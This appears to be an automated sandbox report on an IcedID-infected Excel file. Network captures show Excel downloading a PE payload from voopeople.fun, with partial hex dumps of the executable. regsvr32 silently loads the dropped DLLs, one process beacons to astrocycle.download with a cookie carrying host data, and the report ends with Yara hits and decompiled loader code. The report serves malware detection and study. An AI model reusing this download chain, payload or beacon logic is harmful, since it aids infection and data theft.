                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                                        Host: voopeople.fun
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528039932 CEST3INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Tue, 06 Jul 2021 14:03:20 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 57856
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                                                                        Cache-Control: max-age=14400
                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                        Age: 408
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=ok0%2BKH3qYq2KE6v3gQLN3TWTjlXs%2FKCRGpa%2FlFhmTNEoEITtRmc8v%2F0WKD6n6Q3yMMghYJeW2oB30YxmpG2A3fj2joIQxvcX8ud1RSYOYd%2BwmI%2BaTcYISYPeXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 66a9603d29d64e2b-FRA
                                                                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528080940 CEST5INData Raw: 02 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: @@
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528107882 CEST6INData Raw: 00 00 c7 84 24 a4 00 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89 c0 48 89 54 24
                                                                                                                                                                                                                                        Data Ascii: $#ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@HH
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528140068 CEST8INData Raw: 48 8b 8c 24 a8 00 00 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06 00 00 0f b7 84
                                                                                                                                                                                                                                        Data Ascii: H$HIH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/$lLD$
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528170109 CEST9INData Raw: 00 00 89 84 24 f8 00 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48 8b 8c 24 a8 00
                                                                                                                                                                                                                                        Data Ascii: $D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4D$
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528198004 CEST10INData Raw: 70 48 8b b4 24 a0 00 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03 00 00 48 8b 84
                                                                                                                                                                                                                                        Data Ascii: pH$H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,$
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528225899 CEST12INData Raw: 00 00 00 4c 8b 84 24 a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00 00 00 48 8b 15
                                                                                                                                                                                                                                        Data Ascii: L$AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHL
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528251886 CEST13INData Raw: 89 84 24 44 01 00 00 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 24 68
                                                                                                                                                                                                                                        Data Ascii: $DHL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`D
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528278112 CEST15INData Raw: 24 50 48 89 84 24 70 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b 42
                                                                                                                                                                                                                                        Data Ascii: $PH$pH$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528304100 CEST16INData Raw: 44 8b 04 91 44 89 c1 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24 68
                                                                                                                                                                                                                                        Data Ascii: DDHHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+H
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.528733969 CEST18INData Raw: 8c 24 a0 00 00 00 48 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00 00
                                                                                                                                                                                                                                        Data Ascii: $H$$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                        2192.168.2.2249167172.67.146.8880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.711160898 CEST65OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        UA-CPU: AMD64
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                                        Host: uppercilio.fun
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.792047977 CEST66INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Tue, 06 Jul 2021 14:03:20 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Cache-Control: max-age=14400
                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                        Age: 408
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=fWeVWVyypSGUJiGje2Lz8ONAgj21T%2B%2B4PaHC6GAKNCA9IIT7XF6bu%2Bmy0iUK3ytjvWJ%2BzMAcuIn01qcvHEJmSXD7soAQFo8kkSuKqLvBlBQksEadWY6ZbA4zOMo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 66a9603ead492bb9-FRA
                                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                                        Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 14
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:20.792083025 CEST66INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                        3192.168.2.2249169104.21.37.20980C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:23.550395012 CEST325OUTGET / HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cookie: __gads=3565085024:1:8053:46; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=353036303133:416C627573:30363131453532434638444631434333; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                                                        Host: astrocycle.download
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:24.097198009 CEST326INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                        Date: Tue, 06 Jul 2021 14:03:24 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=c9m9rUyBRXM1jwbZnQnjrdkcxrPLNKC33w7AQ0XAQre54ieS8G0YxkLLsb6qhBGQAR8g40dUX3LfP44TOwFsAmBmZl7LDWuENpEDOUNNRrD%2Fc6PWZud4EH25iI48xq4vIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 66a960506f5bc2f4-FRA
                                                                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                                        Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:24.097229004 CEST326INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        HTTPS Packets

                                                                                                                                                                                                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                                        Jul 6, 2021 16:03:21.934479952 CEST143.204.91.74443192.168.2.2249168CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                                                        CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                                                        CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                                                                        CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034

                                                                                                                                                                                                                                        Code Manipulations

                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                        Analysis Process: EXCEL.EXE PID: 2644 Parent PID: 584

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Start time:16:03:35
                                                                                                                                                                                                                                        Start date:06/07/2021
                                                                                                                                                                                                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                                                        Imagebase:0x13fc70000
                                                                                                                                                                                                                                        File size:27641504 bytes
                                                                                                                                                                                                                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                                                        Analysis Process: regsvr32.exe PID: 2416 Parent PID: 2644

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Start time:16:03:37
                                                                                                                                                                                                                                        Start date:06/07/2021
                                                                                                                                                                                                                                        Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:regsvr32 -silent ..\XRAY.dll
                                                                                                                                                                                                                                        Imagebase:0xffe20000
                                                                                                                                                                                                                                        File size:19456 bytes
                                                                                                                                                                                                                                        MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                                                        Analysis Process: regsvr32.exe PID: 2908 Parent PID: 2644

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Start time:16:03:38
                                                                                                                                                                                                                                        Start date:06/07/2021
                                                                                                                                                                                                                                        Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:regsvr32 -silent ..\XTOWN.dll
                                                                                                                                                                                                                                        Imagebase:0xffe20000
                                                                                                                                                                                                                                        File size:19456 bytes
                                                                                                                                                                                                                                        MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2088452556.0000000000190000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                                                        Analysis Process: regsvr32.exe PID: 2852 Parent PID: 2644

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Start time:16:03:41
                                                                                                                                                                                                                                        Start date:06/07/2021
                                                                                                                                                                                                                                        Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:regsvr32 -silent ..\XZIBIT.dll
                                                                                                                                                                                                                                        Imagebase:0xffe20000
                                                                                                                                                                                                                                        File size:19456 bytes
                                                                                                                                                                                                                                        MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                        Chronological Activities

                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                        Code Analysis

                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                          Analysis Process: regsvr32.exe PID: 2908 Parent PID: 2644 regsvr32.exeCOMMON

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 003C27BC, Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          C-Code - Quality: 25%
                                                                                                                                                                                                                                          			E003C27BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E003C2990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x3c70c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E003C2990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}























                                                                                                                                                                                                                                          0x003c27bc
                                                                                                                                                                                                                                          0x003c27bc
                                                                                                                                                                                                                                          0x003c27bc
                                                                                                                                                                                                                                          0x003c27bf
                                                                                                                                                                                                                                          0x003c27c3
                                                                                                                                                                                                                                          0x003c27c7
                                                                                                                                                                                                                                          0x003c27cb
                                                                                                                                                                                                                                          0x003c27d4
                                                                                                                                                                                                                                          0x003c27d7
                                                                                                                                                                                                                                          0x003c27e7
                                                                                                                                                                                                                                          0x003c27ea
                                                                                                                                                                                                                                          0x003c27fa
                                                                                                                                                                                                                                          0x003c2800
                                                                                                                                                                                                                                          0x003c2806
                                                                                                                                                                                                                                          0x003c285f
                                                                                                                                                                                                                                          0x003c285f
                                                                                                                                                                                                                                          0x003c2876
                                                                                                                                                                                                                                          0x003c287b
                                                                                                                                                                                                                                          0x003c2893
                                                                                                                                                                                                                                          0x003c2893
                                                                                                                                                                                                                                          0x003c280f
                                                                                                                                                                                                                                          0x003c2814
                                                                                                                                                                                                                                          0x003c281f
                                                                                                                                                                                                                                          0x003c282c
                                                                                                                                                                                                                                          0x003c282c
                                                                                                                                                                                                                                          0x003c282f
                                                                                                                                                                                                                                          0x003c2835
                                                                                                                                                                                                                                          0x003c283b
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x003c2842
                                                                                                                                                                                                                                          0x003c2845
                                                                                                                                                                                                                                          0x003c2849
                                                                                                                                                                                                                                          0x003c2894
                                                                                                                                                                                                                                          0x003c2897
                                                                                                                                                                                                                                          0x003c289e
                                                                                                                                                                                                                                          0x003c28a9
                                                                                                                                                                                                                                          0x003c28b5
                                                                                                                                                                                                                                          0x003c28b7
                                                                                                                                                                                                                                          0x003c28ba
                                                                                                                                                                                                                                          0x003c28c1
                                                                                                                                                                                                                                          0x003c28c8
                                                                                                                                                                                                                                          0x003c28cd
                                                                                                                                                                                                                                          0x003c28d0
                                                                                                                                                                                                                                          0x003c28d0
                                                                                                                                                                                                                                          0x003c28b5
                                                                                                                                                                                                                                          0x003c28d7
                                                                                                                                                                                                                                          0x003c28da
                                                                                                                                                                                                                                          0x003c28df
                                                                                                                                                                                                                                          0x003c28e8
                                                                                                                                                                                                                                          0x003c28ed
                                                                                                                                                                                                                                          0x003c28f6
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x003c28fc
                                                                                                                                                                                                                                          0x003c284b
                                                                                                                                                                                                                                          0x003c2854
                                                                                                                                                                                                                                          0x003c2859
                                                                                                                                                                                                                                          0x003c2859

                                                                                                                                                                                                                                          APIs
